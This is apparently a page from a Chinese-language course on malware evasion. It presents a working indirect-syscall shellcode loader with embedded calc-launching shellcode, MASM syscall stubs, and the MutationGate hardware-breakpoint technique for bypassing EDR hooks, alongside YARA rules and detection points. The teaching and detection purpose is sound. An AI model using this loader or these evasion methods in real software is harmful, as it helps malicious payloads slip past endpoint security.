NtWaitForSingleObject( + IN HANDLE ObjectHandle, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER TimeOut OPTIONAL); + 
+EXTERN_C NTSTATUS NtClose( + IN HANDLE Handle); + + + +void GetModule(HMODULE* ntdll, HMODULE* kernel32) +{ + PPEB peb = (PPEB)(__readgsqword(0x60)); + PPEB_LDR_DATA ldr = *(PPEB_LDR_DATA*)((PBYTE)peb + 0x18); //PPEB_LDR_DATA pLdr = pPeb->Ldr; + PLIST_ENTRY ntdlllistentry = *(PLIST_ENTRY*)((PBYTE)ldr + 0x30); + *ntdll = *(HMODULE*)((PBYTE)ntdlllistentry + 0x10); + PLIST_ENTRY kernelbaselistentry = *(PLIST_ENTRY*)((PBYTE)ntdlllistentry); + PLIST_ENTRY kernel32listentry = *(PLIST_ENTRY*)((PBYTE)kernelbaselistentry); + *kernel32 = *(HMODULE*)((PBYTE)kernel32listentry + 0x10); +} + + +UINT_PTR GetSyscallAddr(IN HMODULE hModule, const CHAR* funcName) +{ + PBYTE pBase = (PBYTE)hModule; + UINT_PTR syscall; + + PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase; + if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE) + return 0; + PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew); + if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) + return 0; + + IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader; + PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); + PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames); + PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions); + PWORD FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals); + for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++) + { + CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]); + PBYTE pFunctionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]); + if (_stricmp(funcName, pFunctionName) == 0) + { + syscall = (UINT_PTR)(pFunctionAddress + 0x12); + return syscall; + } + } + return 0; +} + + +int main() +{ + HMODULE ntdll; + HMODULE kernel32; + GetModule(&ntdll, &kernel32); + printf("ntdll base address: %p\n", ntdll); + printf("kernel32 base address: %p\n", kernel32); + 
syscall_addr1 = GetSyscallAddr(ntdll, "NtOpenProcess"); + syscall_addr2 = syscall_addr1 + 0x20; + syscall_addr3 = syscall_addr1 + 0x40; + syscall_addr4 = syscall_addr1 + 0x60; + syscall_addr5 = syscall_addr1 + 0x80; + printf("Address of syscall instruction is 0x%p\n", syscall_addr1); + + + unsigned char code[] = "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"; + + + LPVOID allocation_start; + SIZE_T allocation_size = sizeof(code); + HANDLE hThread; + NTSTATUS status; + + allocation_start = nullptr; + + + // Allocate Virtual Memory + if (NtAllocateVirtualMemory(GetCurrentProcess(), &allocation_start, 0, (PULONG64)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == 0) + printf("Memory allocated at %p\n", allocation_start); + else + printf("Allocated failed, Error code is %d\n", GetLastError()); + + // Copy shellcode into allocated memory + if (NtWriteVirtualMemory(GetCurrentProcess(), allocation_start, code, sizeof(code), 0) == 0) + printf("Copied successfully\n"); + else + printf("Copied failed, Error code is %d\n", GetLastError()); + + + if (NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)allocation_start, NULL, FALSE, NULL, NULL, NULL, NULL) == 0) + printf("Executed successfully\n"); + else + printf("Executed failed, Error code is %d\n", GetLastError()); + + // Wait for the end of 
the thread and close the handle + NtWaitForSingleObject(hThread, FALSE, NULL); + NtClose(hThread); + + return 0; +} + +``` + +**stub.asm** 代码: + +``` +EXTERN syscall_addr1:QWORD +EXTERN syscall_addr2:QWORD +EXTERN syscall_addr3:QWORD +EXTERN syscall_addr4:QWORD +EXTERN syscall_addr5:QWORD + + +.code + +NtAllocateVirtualMemory PROC + mov r10, rcx + mov rax, 18h + jmp QWORD PTR [syscall_addr1] + ret +NtAllocateVirtualMemory ENDP + +NtWriteVirtualMemory PROC + mov r10, rcx + mov rax, 3Ah + jmp QWORD PTR [syscall_addr2] + ret +NtWriteVirtualMemory ENDP + +NtCreateThreadEx PROC + mov r10, rcx + mov rax, 0C2h + jmp QWORD PTR [syscall_addr3] + ret +NtCreateThreadEx ENDP + +NtWaitForSingleObject PROC + mov r10, rcx + mov rax, 4 + jmp QWORD PTR [syscall_addr4] + ret +NtWaitForSingleObject ENDP + +NtClose PROC + mov r10, rcx + mov rax, 0Fh + jmp QWORD PTR [syscall_addr5] + ret +NtClose ENDP + + +end + +``` + +我们在 C 代码里定义了全局变量 syscall_addr,因为该项目实际上还是 C++ 项目,所以需要稍微注意一下格式。出于演示程序的成功执行目的,我选择了 5 个连续的 syscall 指令的地址,如果我们想有意地选择良性 NTAPI 的 syscall 指令地址,需要仔细斟酌一下选择哪些。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/2DsOdplGlL9FcO2p-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/2DsOdplGlL9FcO2p-image.png) + +作为小练习,请写出没有混淆 syscall stub 的情况下,采用间接 syscall 调用的程序的 yara 的检测规则。 + +#### **syswhisper3** + +syswhisper3 是对 syswhisper2 的改进,也可以自动生成我们上面编写的间接 syscall 的程序所需要的相关文件。因为原理差不多,就不做额外解释了。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/mj4EKJRO4TmyLT2M-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/mj4EKJRO4TmyLT2M-image.png) + +导入所需文件的步骤与 syswhisper2 一致,代码也可以复用之前的。编译后,执行结果如下: + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/eg3w3eTT9cO0jLvz-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/eg3w3eTT9cO0jLvz-image.png) + +根据 asm 文件里的函数指令,可以创建相应的 yara 规则: + 
+[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/UDgNdEEjhCBLxC8e-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/UDgNdEEjhCBLxC8e-image.png) + +``` +rule syswhisper3 +{ + meta: + description = "Hunt for syswhispe3 generated asm code" + + strings: + $s1 = {48 89 4c 24 08 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 48 83 ec 28 b9 ?? ?? ?? ?? e8} + $s2 = {48 83 c4 28 48 8b 4c 24 08 48 8b 54 24 10 4c 8b 44 24 18 4c 8b 4c 24 20 4c 8b d1} + condition: + #s1 >=1 or #s2 >=1 +} + +``` + +因为我们导出了所有 NTAPI 的相关文件,匹配数自然很多。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/1B0dhGgwrx9PJtY4-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/1B0dhGgwrx9PJtY4-image.png) + +### **突变之门 MutationGate** + +突变之门 MutationGate 是我在近期的研究成果,其实也是属于间接 syscall 的一种。但毕竟是作者我提出的,所以必须给足牌面,单独安排一个中标题。Github 地址: [https://github.com/senzee1984/MutationGate](https://github.com/senzee1984/MutationGate) 以及英文研究文章: [https://winslow1984.com/books/malware/page/mutationgate](https://winslow1984.com/books/malware/page/mutationgate)  + +MutationGate 通过利用**硬件断点**来重定向系统调用,从而绕过 EDR 的内联 hook。MutationGate 的原理是调用一个未被 hook 的良性 NTAPI,并用被 hook 的 NTAPI 的 SSN 替换这个未被 hook 的 NTAPI 的 SSN。通过这种方式,syscall 被重定向到被 hook 的 NTAPI,而无需加载第 2 个 ntdll 模块或篡改已加载到内存中的 ntdll 模块,就可以绕过内联 hook。 + +EDR 倾向于为一些 NTAPI 设置内联 hook,特别是那些常在恶意软件中被利用的,如 NtAllocateVirtualMemory。而不常被恶意软件利用的 NTAPI 往往不会被 hook,如 NtDrawText。EDR hook 所有 NTAPI 的可能性非常小。 + +假设 NTAPI NtDrawText 没有被 hook,而 NtQueryInformationProcess 被 hook 了,步骤如下: + +1. 获得 NtDrawText 的地址,通过 **GetModuleHandle 与 GetProcAddress 组合**,或者 **PEB Walking 与导出表解析**。 + +``` + pNTDT = GetFuncByHash(ntdll, 0xA1920265); //NtDrawText hash + pNTDTOffset_8 = (PVOID)((BYTE*)pNTDT + 0x8); //Offset 0x8 from NtDrawText + +``` + +2. 为 NtQueryInformationProcess 准备相应参数。 + +3. 
在 **NtDrawText + 0x8** 处设置硬件断点,当执行流程到达这里时,SSN 已经存储在 RAX 中了,但 syscall 还未发起。 + +``` +0:000> u 0x00007FFBAD00EB68-8 +ntdll!NtDrawText: +00007ffb`ad00eb60 4c8bd1 mov r10,rcx +00007ffb`ad00eb63 b8dd000000 mov eax,0DDh +00007ffb`ad00eb68 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1 +00007ffb`ad00eb70 7503 jne ntdll!NtDrawText+0x15 (00007ffb`ad00eb75) +00007ffb`ad00eb72 0f05 syscall +00007ffb`ad00eb74 c3 ret +00007ffb`ad00eb75 cd2e int 2Eh +00007ffb`ad00eb77 c3 ret + +``` + +4. 获取 NtQueryInformationProcess 的 SSN。在异常句柄里,用 NtQueryInformationProcess 的 SSN 替换 NtDrawText 的。 + +``` +...... +uint32_t GetSSNByHash(PVOID pe, uint32_t Hash) +{ + PBYTE pBase = (PBYTE)pe; + PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase; + PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew); + IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader; + DWORD exportdirectory_foa = RvaToFileOffset(pImgNtHdrs, ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); + PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + exportdirectory_foa); //Calculate corresponding offset + PDWORD FunctionNameArray = (PDWORD)(pBase + RvaToFileOffset(pImgNtHdrs, pImgExportDir->AddressOfNames)); + PDWORD FunctionAddressArray = (PDWORD)(pBase + RvaToFileOffset(pImgNtHdrs, pImgExportDir->AddressOfFunctions)); + PWORD FunctionOrdinalArray = (PWORD)(pBase + RvaToFileOffset(pImgNtHdrs, pImgExportDir->AddressOfNameOrdinals)); + + for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++) + { + CHAR* pFunctionName = (CHAR*)(pBase + RvaToFileOffset(pImgNtHdrs, FunctionNameArray[i])); + DWORD Function_RVA = FunctionAddressArray[FunctionOrdinalArray[i]]; + if (Hash == ROR13Hash(pFunctionName)) + { + void *ptr = malloc(10); + if (ptr == NULL) { + perror("malloc failed"); + return -1; + } + unsigned char byteAtOffset5 = *((unsigned char*)(pBase + RvaToFileOffset(pImgNtHdrs, Function_RVA)) + 4); + //printf("Syscall number of 
function %s is: 0x%x\n", pFunctionName,byteAtOffset5); //0x18 + free(ptr); + return byteAtOffset5; + } + } + return 0x0; +} +...... + +``` + +5. 我们调用 NtDrawText 函数,但准备的却是 NtQueryInformationProcess 的参数,这个调用原本会失败的。但因为我们偷梁换柱了 SSN,调用会成功。 + +``` + fnNtQueryInformationProcess pNTQIP = (fnNtQueryInformationProcess)pNTDT; + NTSTATUS status = pNTQIP(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL); + +``` + +这个案例中,NtDrawText 的 SSN 为 0xdd,而 NtQueryInformationProcess 的 SSN 为 0x19,NtDrawText 的地址为 0x00007FFBAD00EB60。 + +这个调用的目标是 NtDrawText 的地址,但准备的是 NtQueryInformationProcess 的参数,因为 SSN 从 0xdd 变为了 0x19,syscall 自然是成功的。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/bSTThGQC0miGDypx-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/bSTThGQC0miGDypx-image.png) + +我们用之前的 yara 规则来扫描该 POC 程序,并没有发现符合的记录,这是当然的。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/O0ZFLfCJXJRN1cZV-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/O0ZFLfCJXJRN1cZV-image.png) + +但破绽也是有的,为了便于观察,以 SleepEx 的 NTAPI **NtDelayExecution** 为例,syscall 是在 ntdll 空间里发起的,看起来还算合理。然而,ntoskrnl 里的 KeDelayExecutionThread 期望的是 NtDelayExecution 发起 syscall,而不是 NtDrawText。这个破绽可以作为检测点。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/UrbS5zVECo8GedtM-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/UrbS5zVECo8GedtM-image.png) + +#### **优势与检测** + +MutationGate 相比其他类似的 unhook 方案具有一定的优势,尽管依旧有可能被检测到。 + +##### **优势** + +1. 不加载第 2 个 ntdll 模块 +2. 不篡改已加载的 ntdll 模块 +3. 不使用自定义的 syscall stub,因此没有对应的字节序列特征 +4. syscall 发生在 ntdll 模块中,看起来是合理的 + +##### **可能的检测方法** + +1. 在正常程序中,调用 **AddVectoredExceptionHandler** 有些可疑 +2. 从内核层检视调用栈,ntoskrnl.exe 中执行的函数与 ntdll 模块中执行的函数不一致 +3. 
正常情况下,在良性 NTAPI 中发起的 syscall 不应携带不属于该函数自身的 SSN + +#### **与其他类似方法的对比** + +HWSyscall([https://github.com/Dec0ne/HWSyscalls](https://github.com/Dec0ne/HWSyscalls)) 和 TamperingSyscall([https://github.com/rad9800/TamperingSyscalls](https://github.com/rad9800/TamperingSyscalls)) 都巧妙地利用硬件断点来绕过内联 hook,都是出色的方法。尽管从我获得灵感到发布 MutationGate 的这段时间里,我没有阅读和引用这两个项目,但 MutationGate 的确利用了一些相似的技术和中心思想。我仔细阅读和研究了它们,并用表格总结与比较,如下所示: + +
| 方法 | 调用的 API | 参数 | SSN | Syscall 指令 |
| --- | --- | --- | --- | --- |
| 突变之门 | 良性 NTAPI | 目标 NTAPI 的参数 | 良性 NTAPI 的 SSN -> 目标 NTAPI 的 SSN | 良性 NTAPI 中 |
| HWSyscall | 目标 NTAPI | 目标 NTAPI 的参数 | 提取目标 NTAPI 的 SSN | 最近的纯净 NTAPI 中 |
| TamperingSyscall | 目标 NTAPI | 占位符参数 -> 目标 NTAPI 的参数 | 通过 EDR 的检测后得到目标 NTAPI 的 SSN | 目标 NTAPI 中 |
| 间接 Syscall | 自定义汇编函数 | 目标 NTAPI 的参数 | 提取目标 NTAPI 的 SSN | 任何纯净的 NTAPI 中 |
+ +作为一个课后练习,请基于该 POC,用 MutationGate 的方法执行 calc 的 shellcode。 \ No newline at end of file